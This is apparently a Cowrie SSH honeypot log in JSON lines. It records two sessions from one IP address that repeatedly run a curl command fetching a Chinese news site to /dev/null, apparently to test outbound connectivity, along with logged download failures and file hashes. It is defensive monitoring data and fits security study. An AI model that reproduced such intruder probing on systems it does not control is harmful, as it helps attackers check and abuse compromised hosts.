{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:09.188552Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:09.244667Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:09.246037Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:09.305618Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:09.307241Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:09.359096Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:09.360801Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:09.366839Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:09.367857Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:09.404604Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:09.405450Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:09.413388Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:09.415090Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:09.456841Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:09.476761Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:09.488280Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:09.489580Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:09.501102Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:09.526954Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:09.547284Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:09.578476Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:09.579870Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:09.598379Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:09.621736Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:09.655798Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:09.677535Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:09.721980Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:09.723196Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:09.736849Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:09.738234Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:09.745052Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:09.767403Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:09.786468Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:09.787643Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:09.789917Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:09.795199Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:09.796180Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:09.834456Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:09.841144Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:09.842454Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:09.844880Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:09.846855Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:09.878459Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:09.892247Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:09.893490Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:09.896532Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:09.898193Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:09.945333Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:09.946477Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:09.950147Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:09.950856Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:10.066411Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.067560Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.069396Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:10.071116Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.072081Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.085142Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.115750Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.117718Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.145921Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:10.159074Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.160347Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.164073Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.166936Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:10.168745Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.169774Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.202430Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.221022Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:10.245672Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.246853Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:10.257298Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.258394Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.264450Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.279118Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:10.293584Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.294554Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.301797Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:10.304086Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.305030Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.320107Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:10.333649Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.334645Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.351383Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:10.363873Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.364905Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:10.396605Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.397586Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.401172Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.402339Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.447531Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.450625Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:10.495613Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.496746Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:10.547608Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.548765Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:10.592168Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.593564Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.597119Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.599328Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:10.640093Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.641505Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.645016Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.646417Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.678108Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:10.698321Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.699913Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.726810Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:10.749665Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.750952Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:10.755422Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.756347Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.772239Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:10.809066Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.810064Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:32:10.813910Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.814817Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.816174Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:32:10.818632Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
